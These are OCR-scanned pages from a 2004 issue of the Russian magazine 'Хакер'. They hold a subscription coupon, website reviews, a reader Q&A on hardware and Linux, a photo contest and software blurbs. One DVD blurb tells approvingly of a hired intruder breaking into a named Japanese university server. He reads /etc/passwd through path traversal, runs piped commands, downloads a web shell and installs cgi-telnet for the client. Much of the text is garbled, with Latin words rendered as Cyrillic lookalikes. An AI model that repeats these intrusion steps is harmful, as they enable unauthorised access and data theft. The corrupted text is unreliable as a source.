( 095 ) 928-6089 ( 095 ) 928-0360 ( 095 ) 928-3574 




ИНДЕКС _ 
УЛИЦА _ 



I 



Я ХОЧУ ПОЛУЧАТЬ 

бесплатный Каталог 

РС АКСЕССУАРОВ .. 



ОТПРАВЬТЕ КУПОН ПО АДРЕСУ: 101000, МОСКВА, ГЛАВПОЧТАМТ, А/Я 652, Е-ЗНОР 



-зГюр 





















Заказ журнала в редакции 



Ц 



ВЫГОДА 

Цена подписки на 20% ниже, чем в розничной продаже! 
Доставка за счет издателя 
Разыгрываются призы и подарки для подписчиков 
Дополнительные скидки при заказе на длительный срок 

ГАРАНТИЯ 




Вы гарантированно получите все номера журнала 

Цена стабильна на весь период заказа, даже при повышении цены в розничной продаже. 
Единая цена по всей России 



СЕРВИС 

Заказ удобно оплатить через любое отделение банка. 

Заказ оформляется с любого месяца. 

Заказ осуществляется заказной бандеролью или с курьером 
Заказ можно сделать на любое количество месяцев 



Закажи журнал в редакции и сэкономь деньги 



Стоимость заказа на «Хакер» + 2 СВ или + ВѴО 





за номер 




за 6 месяцев 




за 12 месяцев 
(выгода 10%) 





за 6 месяцев 




за 12 месяцев 
(выгода 10%) 



Стоимость заказа на комплект «Хакер» + «Железо» 








за номер (выгода 10%) 
за 6 месяцев (выгода 15%) 
за 12 месяцев (выгода 20%) 






V 



ПОДПИСНОЙ КУПОН 

Прошу оформить подписку 
на журнал «Хакер» 



□ 



на | | месяцев 

начиная с 



2004 г. 



□ Доставлять журнал по почте 
на домашний адрес 

□ Доставлять журнал курьером на 
адрес офиса (по г. Москве) 

Подробнее о курьерской доставке 
читайте ниже 



(отметьте квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 



город 



улица 



дом 



корпус 



квартира/офис 



телефон 



подпись 



сумма оплаты 




ИНН 



7729410015 



ООО «Гейм Лэнд» 



ЗАО Международный Московский Банк, 


г. Москва 


р/с № 40702810700010298407 


к/с № 30101810300000000545 


БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 




Сумма 


Оплата журнала « 


» 




с 


2004 г. 





Ф.И.О. 



Подпись плательщика 



ИНН 7729410015 



ООО «Гейм Лэнд» 



ЗАО Международный Московский Банк, 


г. Москва 


р/с № 40702810700010298407 


к/с № 30101810300000000545 


БИК 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


2004 г. 





Ф.И.О. 



Подпись плательщика 



Как оформить заказ? 




АІк 


1 . Заполнить купон и квитанцию 

2. Перечислить стоимость подписки через Сбербанк 


щ 




Р 






3. Обязательно прислать в редакцию копию оплаченной квитанции с четко заполненным купоном: по 
электронной почте: зиЬзсгіЬе_ха@датеІапсІ.ги или по факсу: 924-9694 



Курьерская доставка осуществляется только по Москве на адрес офиса, для оформления доставки 
курьером укажите адрес и название фирмы в подписном купоне 



Почтовая подписка 



С 1 сентября по 30 ноября вы также можете оформить почтовую подписку по каталогам подписных агентств во всех отделениях связи 
России. Для оформления подписки необходимо знать подписной индекс журнала или найти его в каталоге по названию. 



45722 Хакер + 2 СО 
29919 Хакер + т 



Тел.: (095) 974-11-11 



16768 Хакер + 2 СО 
16766 Хакер + т 



ІШМфМНР 

4ЙІІ "СКСИВ 






Тел.: (095) 974-21-31 



45722 Хакер + 2 СО 
29919 Хакер + Ш 




Тел.: (095) 974-11-11 









юниты 








/ 



ХПКЕР/№09(69)/2004 



I ЬООЫ ік (ЬООЬ 1 ікігеаі.хакер.ги), Иван Скляров (ЗкІуагоѵцгеаІ.хакер.ги) 
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ѵ сѵоем спои 
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Ні1:р://сус!ет.рр-ги 



П ро «Сусіет дгоир» на сайте сказано следующее: «это неформальное 
объединение людей, цель которого - изучение технологий и исследо- 
вания в Зесигііу/Наскіпд/Сгаскіпд/СосІіпд/РІпгеакіпд/Ѵігтакіпд областях, 
создание общих проектов, а также исследование различных 05». На сайте 
действительно почти все материалы принадлежат членам группы, причем 
попадаются довольно интересные и полезные вещи. Например, «Взлом и 
исследование программ под РгееВЗР», «Анализ М5 5С!І_ ѵѵогпл ЗаррЫге», 
авторские «кря-кря», истории взломов и пр. Ведется также ВидТгац и ново- 
стная лента. 



г 


' ЭЛЕКТРОННЫЙ 

журнал "РНР тою 


Е" 


ИЪір : //деЬаі 1 


■ рНрсІиЬ ■ пеі/радез/рНртад.рНЪтІ 



Р НР Іпзісіе - это русский е-гіпе, посвященный языку РНР, от энтузиастов 
из сообщества РНРСІиЬ. Распространяется ежемесячно в формате РРР. 
Немало статей в журнале посвящено безопасности РНР, повышению произ- 
водительности и эффективности кода. Периодически появляются интервью с 
разработчиками языка, выкладываются исторические материалы, например 
«История успеха рІірВВ». Рассматриваются все самые современные техноло- 
гии - приме- 
нение ОРМ в 
РНР, расши- 
рение РНР5 
РОМ, ХЗИ, 
ХРаМі. Ты то- 
же можешь 
принять 
участие в 
развитии и 
продвижении 
журнала. 




ОССЕМБПЕР И НЕ ТОЛЬКО 



Ні1:р://а5т.5ІіасІгіп5к.пеі 






Ж утко тормозной сайт с безобразным дизайном (если здесь вообще приме- 
нимо такое слово), однако это нисколько не уменьшает его ценности. Дан- 
ный сайт - персональная страничка Владислава Пирогова, автора множества 
книг по Ассемблеру. Таких, как «АззетЫег учебный курс», «Ассемблер для 

ѴѴіпсІоѵѵз» и пр. Сайт в 




-та 



первую очередь интере- 
сен отличной подборкой 
книг, туториалов и статей 
по Ассемблеру (советую, 
например, прочесть «Дао 
программиста»). Естест- 
венно, не обойдена вни- 
манием отладка, дизас- 
семблирование и иссле- 
дование программ. 







особенности национальным 
задач по информптике 



Ніі р://оп 2 І • пагод • ги 




Э тот сайт полностью посвящен одной-единственной книге под названи- 
ем «Особенности национальных задач по информатике». Ее авторы - в 
прошлом победители международных олимпиад по информатике, а в нас- 
тоящее время - тренеры национальной сборной России и члены научного 
комитета Всероссийской олимпиады по информатике. В книге собран весь 
опыт практических занятий по подготовке сборной команды России к меж- 
дународным соревнованиям по программированию. На сайте выложены 
все главы книги с множеством олимпиадных задач с решениями. 



144 








программистский кпмень 



НЪЪр://ргодз*:опе.пт.ги 



. 




П очему одни люди умеют и любят программировать, а другие нет? Этой 
проблемой озаботились двое американских парней - Алан Картер и Коло- 
той Сэнджер. Американцы любят заботиться обо всем на свете (об Ираке, 
например), поэтому естественно, что они задались философским вопросом: 
как же все-таки научить всех людей программированию? Как оказалось, 
проблема зарыта глубоко в способе мышления человека, поэтому они поде- 
лили людей на 
два типа: «паков- 
щиков» и «карто- 
строителей». 
Ргодгаттегз' 
Зіопе будет ин- 
тересен как сос- 
тоявшимся прог- 
раммистам, так 
и недоп рограм- 
м йотам. 




СУМПСШЕЦШИЕ РУССКИЕ 



Н*:{:р://сга2уги55Іап-сот 




Р усские люди всегда 
славились своим 
умом, сообразитель- 
ностью и тонким юмо- 
ром. Вот и сайт 
м.сгагуішіап.сот тоже 
сделали и поддерживают 
наши соотечественники. 
На самом деле ничего та- 
кого в стиле крэзи там 
нет. Сайт целиком и пол- 
ностью посвящен развлечению, чтобы люди могли нормально зарядиться энер- 
гией позитива. Помимо музыки и видеороликов, здесь можно найти «ужасные» 
истории от создателей сайта, отослать другу или подруге пошлую открытку, по- 
общаться с безбашенными единомышленниками на форуме. Да и много чего 
еще интересного можно найти на Крэзи Рашн. Рекомендую! 



ППКОГОПЬ-ФРИСТПЙП 



Н*:{:р://ыадеп5сНепкѳ.сН 





Б ыло время, когда интернетчики поголовно болели флеш-игрой, в которой 
надо было дубинкой стегать пингвина, чтобы он улетел далеко и надолго. Но 
эта гама быстро канула в лету, потому что где в реальной жизни найти пингвина 
и отдубасить его? Никакой реалистичности, короче. А вот напиваемся мы посто- 
янно. Поэтому новая игра тебе понравится. Дергая мышью туда-сюда, надо не 
дать упасть небритому челу под градусом. Что, думаешь, все просто? Хренушки! 
Я больше 84 метров пройти так и не смог. Попробуй - понравится, я уверен :). 



В принципе, то же самое развлекалово. Куча онлайновых игрушек, свежие 
анекдоты, видеоролики с приколами, юморные рассказы и смешные кар- 
тинки. Чего тут кошмарного - ума не приложу. Поискал по всему сайту чего- 
нибудь страшного - не нашел. Предполагаю, что домен ѵѵш.$те№ог$ііікі.сот 
был уже занят, поэтому владелец кошмариков решил зарегать для себя имен- 
но такое имя. Ладно, это все лирика. Интересен сайт тем, что он является 
еще и огромной подборкой ссылок в р2р-сетях на различные фильмы и му- 
зыку, что, согласись, очень полезно. 




РПБОЧИЙ стоп одминп 



Н*:{:р://асІтіп-сІѲ5к{:ор.Ьу.ги 




Д умаешь, что все админы сидят исключительно в консоли и все у них как-то 
не по-русски? Да ну, что ты фантазируешь-то? Все у них красиво на компь- 
ютере, поверь. На сайте шѵѵ.асІтіп-сІезкІор.Ьу.ги собраны скриншоты рабочих сто- 
лов самых разных людей, хоть каким-то боком связанных с администрировани- 
ем :). Я на первой страничке даже нашел скрин Экслеровского рабочего стола. 
Потому что он админ своего сайта :). Мне понравилось рассматривать чужие 
десктопы, но для меня осталось загадкой, почему все ставят какие-то изощрен- 
ные картинки. Вот у меня в свойствах фона стоит «нет» :). В общем, поползай по 
сайту, может, чего и понравится :). 









Задавая вопрос, подумай! Не стоит мне посылать 
вопросы, так ипи иначе свлзанные 
с хаком/кряком/фриком, дпя этого есть ІіасИац 
ПіаскіадігеаІ.хакер.іи), не стоит также задавать 
откровенно памерские вопросы, ответ на которые 
ты при определенном желании можешь найти и сам. 

Я не телепат, поэтому конкретизируй вопрос, 
присыпай как можно больше информации. 



А как можно убрать отображение ТІазИ’евой рекламы с сайтов? Ну сил 
моих больше нет. И на уапсіех.ги, и на іхЬІги ее полно. Недавно вообще 
пришлось ждать 5 минут, пока загружалась нужная мне страница (на 
диал-апе). Какой-то умник решил украсить ее меговым роликом. Мо- 
жет быть, вообще снести на фиг этот ТІазІі-плеер? 



ІІ|І Хочу в ближайшее время на даче повесить спутник и наладить через 
него инет. Изучаю в данный момент конъюнктуру :). Как я понял, есть 
2 нормальных провайдера для европейской части РФ - 
ѵѵш.рІапеі$ку.сот и ѵѵш.$раседаІе.сот. Что ты по поводу них думаешь? И 
еще, какую ЭѴВ- карту посоветуешь взять, чтобы ее под РгееВЗй 
можно было поднять? Причем я не хочу брать ЗкуЗІагІ , поскольку о 
ней много плохих отзывов. Говорят, что греются они и вообще глюч- 
ные. Можешь что-то посоветовать? 

( П } 

На самом деле в центральной части нашей необъятной Родины 
список доступных провайдеров двумя лишь пунктами не ограничивает- 
ся. Другое дело, что два вышеобозначенных прова наиболее известны, так 
как, во-первых, лихо разрекламированы, а во-вторых, хорошо себя зареко- 
мендовали. Лично я сейчас в поиске - у обоих из них я купил десятидолларо- 
вый тест. Что я могу тебе сказать... Внешне эти сервисы практически ничем 
не отличаются. Разве что тарифы у них несколько разные. Как у одного, так и 
у другого со скоростью и качеством приема никаких проблем нет. По крайней 
мере, тот же мегабит во время скачки с шустрых сайтов достигается влегкую. 
Но зацикливаться на одних только этих провайдерах не стоит - есть еще мас- 
са заманчивых предложений. К примеру, как тебе нравится идея взять за $36 
6 гигов трафика на скорости 300 кбит/с (шѵѵ.пеІ$у$іет.сот) или за $24 вообще 
анлим, правда, на негарантированной скорости (ѵѵѵѵѵѵ.ЬгоасІЬапсІ.сот/орепзку)? 

Что касается ОѴВ-адаптера, то и здесь не все так однозначно. Наиболее расп- 
ространенными девайсами, разумеется, являются ЗкуЗІагІ и 3ку31аг2. Первая 
- полностью аппаратная, вторая - софтверная. Я сам юзаю СС2 и, скорее все- 
го, был бы ею полностью доволен, если бы не одно большое «НО». Я так и не 
смог для нее найти рабочие дрова под *піх. Никак не поймешь, почему? Тог- 
да вспоминай, что было поначалу с ѵѵіп -модемами. Так вот, ситуация с СС2 ее 
полностью повторяет :(. У СС1 , к счастью, такой проблемы нет, однако за пос- 
леднее время они сильно деградировали в плане качества. Так, последние ре- 
визии основываются уже не на проверенном временем РЫІірз’овском чипсе- 
те, а на какой-то лаже. А последствия? Последствия самые разные, начиная от 
перегревов и заканчивая разными глюками. Справедливости ради стоит отме- 
тить, что СС2 также более похожа на жар-птицу. Поэтому неудивительно, что 
многие настоятельно рекомендуют устанавливать на нее дополнительное ох- 
лаждение. Хотя лично у меня и без него все работает просто прекрасно. 



( р } 

Ууу, да вариантов на самом деле уйма! И удаление ТІазИ-плеера - 

это, пожалуй, худший из них. Потому что всякий раз при заходе на 
сайт, имеющий ТІазИ-ролики, браузер тебе будет скачивать и назойливо пред- 
лагать установить этот самый несчастный плеер. Что самое неприятное, в по- 
являющемся окошке имеется кнопка «всегда доверять Масготесііа», но нали- 
чие кнопки «никогда не доверять» почему-то сочли ненужным. Меня, приз- 
наться, такое положение дел всегда убивало наповал, поэтому я предпочитаю 
другие варианты. К примеру, реализацию на уровне файрвола. Тот же Адпйипл 
Оифозі: имеет специальный плагин для контроля над активным содержанием, 
с помощью которого можно резать все ТІазИ’ки на корню! Если этот способ 
чем-то тебя не устраивает, то попробуй воспользоваться специализированны- 
ми прогами. Например, утилитой РІазІпЗѵѵйсІі (шѵѵ.(Іа$!ш(с!і.соп). Это прога 
помещает в трей свою иконку, с помощью которой и отключается всякое про- 
игрывание ЯазИ . В конце концов, можно резать флешки на уровне браузера. 
Всякие добавки к ІЕ, типа МуІЕ, имеют так называемые фильтры. Просто скор- 
ми им строку «*.зѵ\4». 



ѴЦу Объясни на пальцах, в чем разница между [АИ и МАІЧ. А то аббреви- 
атуры эти на каждом шагу встречаю, а что они обозначают, толком не 
знаю. Спасибо. 

(Т) 

ІАИ (І_осаІ Агеа Иеілл/огк) - локальные сети, которые с географичес- 
кой точки зрения отличаются довольно-таки скромными масштабами. 
Располагаются они в офисных зданиях, жилых домах, кварталах. Максимум - 
в районе или малюсеньких городах. 

МАИ (Меігороіііап Агеа Иеілл/огк) - сеть с большим географическим покрыти- 
ем, объединяющая от нескольких районов до целых вполне приличных горо- 
дов. Установка и обслуживание такой сети проходит параллельно с налажива- 
ниями электро- и водоснабжения. 

Обобщая, можно сказать, что эти два понятия определяют скорее географи- 
ческий масштаб сети, нежели ее техническую реализацию. 





(п) 

Первоначально беспроводные сети вообще работали на частотах в 

диапазоне 902-928 МГц. Но так как их максимальная теоретическая 
скорость не превышала 900 кбит/с, от них пришлось быстро отказаться. 
Внимание производителей радиооборудования привлек другой частотный 
диапазон - 2400-2483 МГц. Благодаря большей пропускной способности и 
меньшему уровню помех от других радиосредств, он был куда 
предпочтительнее. Сети на 2.4 ГГц стали быстро развиваться, даже несмотря 
на проблемы с лицензированием радиоканала. Для справки: в России, да и во 
многих других странах использование этих частот разрешено лишь частично. 
Впрочем, если что-то не разрешено, это еще не значит, что делать этого 
нельзя. Так, с учетом слабого контроля, пиратство вокруг полосы 2.4 ГГц ныне 
процветает. Можно даже сказать, что здесь царит полный беспредел =). 
Подходящее оборудование беспрепятственно продается за разумные деньги 
и легко устанавливается. При этом по ушам никто не дает. Что же касается 
диапазона в 5 ГГц, то это пока еще нетронутая ниша. По крайней мере, если 
сравнивать с 2.4 ГГц сетями. 

Появился он только после провала диапазона в 3.5 ГГц, который 
просуществовал совсем недолго. Причина тому - оборудование создавало 
необоснованно сильные помехи в радиоэфире. Это сильно подстегнуло 
производителей к выпуску девайсов для работы в 5.15-5.7 ГГц. 



В последнее время занялся самостоятельным изучением языка С++. 
Читаю вузовские лекции и учебники, а также пытаюсь выполнять для 
самопроверки некоторые задания. С одним из таких буквально зашел 
в тупик. Даже не знаю, с какой стороны к нему подойти. Значит так: 
от меня требуется перевести любую алгебраическую формулу из ин- 
фиксной формы записи в постфиксную. Так вот, я даже не знаю, что 
значит «инфиксная» и «постфиксная». Это что еще за звери такие? 

( П } 

Здравствуйте, студент. Опять задание не выполнили? Инфиксная 
форма записи алгебраических выражений должна быть знакома тебе 
со школы (если ты в нее ходил, на что я искренне надеюсь). В ее случае знак 
операции находится между операндами. Например, «2*2+3» или «(24+1 8)/3». 
Однако такая форма далеко не идеальна, особенно когда работаешь над 
транслятором такого рода алгебраических выражений. «Что тут сложного?» - 
спросишь ты. Аты приглядись внимательнее и обдумай свой вопрос! Ведь вся 
последовательность зависит от скобочной структуры, поэтому, хочешь ты это- 
го или нет, ее приходится анализировать и учитывать. Более того, на одном 
уровне операции имеют различные приоритеты. И об этом тоже нельзя забы- 
вать! 

Польскому математику Ю. Лукасевичу, видимо, это очень не понравилось, по- 
этому он, почесав репу, начал работать над созданием другой формы записи 
формул - постфиксной. Знак операции здесь находится уже не между операн- 
дами, а после них. То есть «22*3 +» или «24 18 + 3 /». И... о чудо! Оказа- 
лось, что постфиксная форма с лихвой устраняет все имеющиеся сложности, 
т.к. выражения в ее случае не имеют скобок. Что еще немаловажно - все вхо- 
дящие в нее операнды выполняются в порядке их записи. Никакие приорите- 
ты учитывать не нужно - их попросту нет. 

Существует довольно много алгоритмов для перевода формулы из одной 
формы записи в другую. Наиболее успешные из них - с применением стека 
или бинарных деревьев. Подробное описание и конкретные реализации на 
разных языках программирования ты можешь найти на 
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® Правильно! Если объяснять в двух словах, то это некая замена 

стандартному сетевому окружению. Работает І_І5а как пользовательский 
сервис, при этом полагается лишь на стек протокола ТРС/ІР безо всякого 
использования затЬа и подобных средств. Информация о хостах 
обеспечивается через 7741 ТСР-порт, и ее поиск осуществляется двумя 
разными способами. Первый способ: посылка другим хостам пакетов эхо- 
запроса ІСМР. Второй способ: ІМеШІОЗ-широковещательные запросы. Сеть во 
время поиска, ясное дело, немного «забивается». Чтобы этого избежать, 
применяются специальные алгоритмы. Плюс к этому имеется простенький 
базовый механизм безопасности. Для локальных сетей с очень строгими 
правилами доступна также облегченная версия демона - гезІ_І5а. Проблемы с 
установкой могут возникнуть разве только на 64-битных машинах. Советую 
взглянуть на подробный мануал, зайдя по адресу ШрУ/Ііпих$Іюр.ш/ІіпихЬедіп/аі1і- 
сІеМІМ 







За свою недолгую практику я перепробовал множество дистрибутивов 
линукса. Сейчас вот решил заказать и попробовать СуСю (ЗиЗе). Может 
быть, расскажешь о нем: в чем его плюсы, в чем минусы? 



Как в РеІрЫ можно открыть сразу несколько копий одной формы? 



У меня на работе стоит ЗиЗе на сервере. Впечатления на самом деле 
двойственные: с одной стороны, дистрибутив очень неплох, но с другой, 
есть некоторые неприятные минусы. 

О Кривой и неудобный установщик - это, конечно, дело времени. В послед- 
ней версии, возможно, его уже заменили. Но то, что было раньше, не лезет 
ни в какие рамки. 

О Своеобразное понимание, что и где должно лежать. Это касается как конфигу- 
рационных файлов, так и всего остального. В результате некоторые программы 
собираются не вполне корректно, если вообще собираются. Причем это же отно- 
сится к драйверам железа. Поэтому дистрибутив новичкам использовать не сове- 
тую. 

О Стабильность. ІІрйте у серверов был не меньше месяца. 

О Хорошая документация. 

О Наличие специальных мощных конфигураторов, имеющих графическую обо- 
лочку. 

О Симпатичный вид иксов - глаз радуется. 

О Отсутствие проблем с русификацией (на ІІТР-8). 



Да проще простого: 

ѵаг 

П.Р2.РЗ: ТРогтЦ’ 

Ьедіп 

АррІісаііоп.СгеаіеРогт(ТРогтКРІ); 

АррІісаііоп.СгеаіеРогт(ТРогтЩ; 

АррІісаііоп.СгеаіеРогт(ТРогтШ); 

Р1.$Іщ Р2.$1щ Р3.$1щ 
еп(І; 

Форму, естественно, нужно прописать как не автоматически создаваемую. И 
еще (это очень важно) не забудь в обработчике ТРогт25.0пСІозе указать 
Асйоп:=саРгее. В противном случае неизбежна утечка памяти со всеми 
вытекающими отсюда последствиями. 



Решил поставить себе новое ядро (ось - Ресіога), чтобы посмотреть, 
что и как. Скачал дистрибутив с кегпеі.огд, сконфигурировал, собрал, 
установил модули. Но как только набрал «# таке іпзіаІІ», в ответ 
получил следующее: 

таке[1]: 'агсРі/і386/кегпеІ/а$т-оТР$еІ$.$' 

СНК іпсЫе/Ііпих/сотріІе.Іі 
КегпеІ: агсІі/і386/Ьооі/Ь2Ітаде і$ геа(1у 

$Іі /и$г/$гс/Ііпих-2.6.7/агсІі/і386/1)ооі/іп$іаІІ.$Іі 2.6.7 агсРі/і386/Ьооі/Ь2Ітаде $у$іет.тар "" 

АН оР уоиг ІоорЬаск сіеѵісез аге іп и$е. 
ткіпіігН РаіІесІ 

такеШ:*** [іпзіаІІ] ?????? 1 
таке: *** [іпзіаіі] Ошибка 2 

Раньше такого никогда не было. Помоги, ріеазе! 

Скорее всего, ты неправильно сконфигурировал ядро. Попробуй 
пересобрать следующими командами: 

И тобргоЬе Іоор 

# бте$д 

# таке іп$іаІІ 



А как сейчас обстоят дела с материнками для последних АФІоп 64 
(степпинги СО и СО)? Справляются с поддержкой 1 Гбайт памяти? 
Помнится, не так давно у них с этим были серьезные проблемы... 

® Эти траблы как присутствовали пару месяцев назад, так по-прежне- 
му и присутствуют. Связано это с тем, что контроллер памяти АФІоп 64 
в силу своей специфики не поддерживает два двусторонних модуля памяти на 
частоте 200 МГц (ОЭР400 или РС3200). Обещают лишь поддержку конфигура- 
ции 166 МГц или ОйПЗЗЗ. Но это даже не смешно. На фига, спрашивается, 
покупать столь продвинутый проц и комплектовать его столь тормозной (от- 
носительно, естественно) памятью? Ситуация особенно усугубляется из-за то- 
го, что односторонние модули ОЭР400 на 512 Мб найти пока еще невероятно 
трудно, хотя они и считаются чуть ли не идеальным вариантом. Выходом из 
этой ситуации является покупка комплекта из пары модулей, корректную ра- 
боту которых гарантирует производитель. Это с какой-то стороны даже пред- 
почтительнее, поскольку за 1 -Гбайтный модуль с тебя попросят кучу денег. 
Тенденции к тому, что это все безобразие когда-нибудь пофиксят, все же 
имеются. По крайней мере, уже есть платы, которые подобных проблем не 
знают. Типичный пример - брендовая Азиз К8Ѵ Эеіихе. 



ІІ|І Ура, дождались! ЭоогтіЗ ушел на золото. Собираюсь в срочном поряд- 
ке делать апгрейд, потому как моя текущая тачка играть в столь на- 
вороченные игрушки, мягко говоря, не позволяет. Меня интересует 
одно: какую видюху взять? Их теперь столько развелось... 

( П } 

Лучше всего взять видеокарту на чипе серии ІМѴЮІА СеРогсе 6800. 
Версии Шга или СТ обеспечивают достойный РР5 даже на разрешении 
1600x1200. Хотя при установке самого лучшего качества картинки советую все 
же сбавить обороты и остановиться на отметке 1 024x768. Если денег на такую 
видюху не будет (а их не будет :), то приглядись к менее дорогим моделям 
ІМѴЮІА - СеРогсе 5950 Шга и СеРогсе 5900. Судя по тестам, в Роот’е они выг- 
лядят несколько лучше, чем их ближайшие оппоненты - ВАЭЕОІМ 9800 ХТ/РВО. 
Однако и они не являются обязательным требованием. У меня вполне сносно 
идет игра на СеРогсе РХ 5700 Шга. Картинка, конечно, не фонтан, но, в прин- 
ципе, вполне приличная. 





Будь здоров, читатель! 

Как там твой комп? Как принтер, не чихает? 

О да, мы более чем уверены, что после твоих 
настроек система на твоем компе работает как 
швейцарские часы. 

Это все замечательно, но как ты относишься к тому, 
что большинство людей по всему миру считают хакеров 
какими-то длинноволосыми гиками с прыщавыми от долго- 
го сидения задницами? Все считают, что хакеры не встреча- 
ются с девушками, потому что у них пахнет изо рта какахами и 
прочими фекалиями. 

А нам забить на такое мнение, ведь мы с тобой знаем, что все это 
сущий бред и вымысел! Чтобы доказать всем обратное, мы решили 
устроить читательский конкурс. Сфотографируй свою девчонку с жур- 
налом «Хакер» в самых неимоверных позах и местах и засылай нам! 

Лучшие фотки будут опубликованы в следующем номере, а автор самого 
классного снимка будет щедро вознагражден :). 

Условия к засылаемым материалам: формат ірд, діі или ІіТ Фотки в других 
форматах мы отправляем в трэш. Также на фотке обязательно должен присут- 
ствовать журнал «Хакер» (антифрауд :)). Фотки слать сюда: 
копкиг8@геаІ.хакер.ш. 

З.Ы.: читательницы также могут делать свои фотографии и присылать нам :). 
Вот и все, амиго, ждем твои творения! 











Выполнение произвольной команды 



ОВИДЕО: ССІ ВІІС8 

Случается, что хакеры работают на заказ. Такая работенка 
выпала одному взломщику, которого попросили хакнуть японс- 
кий ресурс ѵѵшізока.ас.ір и стащить оттуда несколько важных 
документов. Прежде чем действовать, сетевой партизан при- 
коннекгился к своему шеллу, затем пропинговал сервер и убе- 
дился в том, что машина защищена файрволом. Сканировать 
порты было бессмысленно, поэтому взломщик решил поискать 
дыры в ш/ѵѵ-скриптах. Хакеру повезло, он нашел бажный сце- 
нарий в директории /сді-Ьіп. Скрипт назывался зМз.сді. Если 
хакер указывал значение параметра йіепате равным 
«../../../../../../../еіс/раззѵѵсі», то файл успешно отображался на 
экране :). Только вот незадача: на экране появлялась лишь пер- 
вая строка раззѵѵсі. Через несколько минут хакер обнаружил, что 
скрипт умеет запускать команды. В случае, если команда будет 
помещена между двумя пайпами (|), она успешно выполнится. 

Спустя какое-то время взломщик убедился в том, что скрипт 
не понимает символа перенаправления («>»). Следовательно, 
сетевой партизан не может составить йр-сценарий. Но хакер 
узнал, что на машине есть файл СВЕТ, который умеет заливать 
файлы. Если перенаправить его дескриптор вывода на ЗТОІИ 
регі-интерпретатора, то у взломщика появится возможность за- 
пускать команды без каких-либо ограничений. 

Переварив все это в голове, взломщик составил временный 
файл Тііе.сді, в котором содержалось всего две строки. Одна из 
них заливает СЕТ’ом файл стсі.сді (полноценный ѵѵеЬ-зііеІІ), 
вторая останавливает прием данных из дескриптора СТОИМ. 
Трюк удался, и теперь взломщик может выполнять команды из 
полноценной оболочки стсі.сді. Ее хакер сохранил прямо в 
ѵѵѵѵѵѵ- каталоге, благо имел все права для этого. 



Собственно, теперь хакеру ничто не мешало слить необхо- 
димые доки и смыться с сервера. Но заказчик оборзел и попро- 
сил полноценный доступ к серверу, чтобы похозяйничать там 
самостоятельно. Для этого взломщику пришлось установить 
скрипт сді-іеіпеі.сді, позволяющий рулить сервером с тм. 
Особенность этого проекта - поддержка скачивания файлов с 
сервера. Достаточно кликнуть по ссылке и задать путь к файлу. 
Повторив все действия с заливкой файла, хакер закачал сді-іеі- 
пеі, не забыв изменить путь к интерпретатору (регі находился в 
/изг/ІосаІ/Ьіп) и поставить права доступа 0755 на файл. Убедив- 
шись, что все работает, взломщик оповестил заказчика о вы- 
полнении договора. 

Более подробные действия сетевого нарушителя ты можешь 
прочитать в статье «Взлом по-японски». Практическую часть 
смотри в интересном видео по взлому. 

оо. СІопеЗру 2.1 1 - это программа, которую необхо- 
димо установить в обязательном порядке. Если ты смотрел 
фильм «Клон» и думаешь, что название софтины как-то с 
этим связано, то я тебя огорчу - это не так. Зато КлонСпай 
ищет по заданному адресу дубликаты файлов. Поиск ведется 
по их контрольным суммам, так что названные по-разному, но 
идентичные по содержанию файлики обязательно будут най- 
дены. Можно настроить поиск таким образом, чтобы искались 
и файлы-тезки. Также есть возможность отлавливать близкие 
по размеру файлы. Очень удобно в том случае, если нужно 
отследить более старую версию какого-либо документа. 
СІопеЗру, в зависимости от твоих установок, может сразу уда- 
лять дублирующие файлы, каждый раз спрашивать у тебя 
разрешения, ну или просто составить текстовый отчет обо 
всех найденных одинаковых файлах, отсортировав их по раз- 
меру. 



О. ѴѴіпбоѵѵз ХР Зегѵісе Раск 2 (ЕпдІізН ѵегзіоп). Трепе- 
щите, обладатели английской Винды, 266-метровое чудо ждет 
вас на ДВД- диске! 

О. Тгапзрагепі ѴѴіпбоѵѵ 
Мападег 1.9.1 - програм- 
мулина, позволяющая легко 
модифицировать настройки 
окон приложений в Винде. 

Теперь ты сможешь изме- 
нить прозрачность любого 
окна (фотошоперы сразу 
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поймут, что за чудо-программу я описываю, и побегут быст- 
рее устанавливать) и создать приоритеты появления окон. 
Также можно скинуть в трей абсолютно любое запущенное 
приложение, поместить его поверх других окон или спрятать 
в самый-самый низ, запретить в определенном окне ввод с 
клавиатуры и автоматически сворачивать окошко в полоску, 
когда оно становится неактивным. 

о. ОгіѵеІ.ЕО 2.0 - это системная утилита, выводящая на 
экран І_ЕО-индикаторы. Она позволяет видеть, какой из укра- 
донных тобой оо оклада жестких дисков в данный момент на- 
ходится в активном состоянии и что за процесс происходит: 
чтение или запись данных. Работать можно как с локальными, 
так и с сетевыми дисками. Отличное средство не только для 
мониторинга, но и для предотвращения потери данных в слу- 
чае неисправности винта. 



О. АЬіѴѴогсІ 2.0.8 - легковесный и многофункциональный 
текстовый редактор. Скажем тупому блокноту: «Нет»! Забудем 
о тормознутом Ворде! АбиВорд без проблем откроет .бос, .гй 
файлы, НТМІ_-странички и много других форматов, включая 
самые раритетные. Я бы не советовал тебе эту софтину, если 
бы в ней не было проверки орфографии. Но она есть, и права 
русского языка там не ущемлены. 
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Непростая закачка файлов 
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М-СР1ЕИ 



Любой человек чего-нибудь боится. Даже хакер. О уж если этот хакер из редакции одиоиненного журнала, то страхов у него 
еще больше. Давай узнаем, чего же на самом деле трусят наши авторы в реальной жизни. 



ѵѵѵѵѵѵ.ІіѵеіоигпаІ.сот/соттипі1у/х_сгет 




В се чего-то боятся. Я, например, бо- 
юсь темных переулков. Нет, у меня 
не было неприятных ситуаций, но меня 
пробирают мурашки, если я вдруг оказы- 
ваюсь на темной аллейке в три часа ночи 
:). Еще я боюсь высоты. Например, когда 
мне случается протягивать витую пару на 

уровне второго этажа, у меня невольно подкашиваются ноги. Приходится звать 
кого-нибудь из коллег и просить подержать лестницу. Становится легче :). 
Стыдно признаться, но меня пугают глобальные катастрофы, концы света, па- 
дения метеоритов и прочие аномалии. Порой кажется, что завтра нас посетят 
инопланетяне и развяжут межпланетную войну. Нет, это не приступ сумасше- 
ствия - я реально верю во внеземные цивилизации. 

Из животных я никого не боюсь. Зверушки любят меня, а я люблю их. Правда, бы- 
вает, что из подворотни в мою сторону мчится бешеная собака. Приходится увора- 
чиваться и обороняться подручными предметами :). 




Я такой же нормальный человек, как и 
все. И у меня есть свои страхи. Напри- 
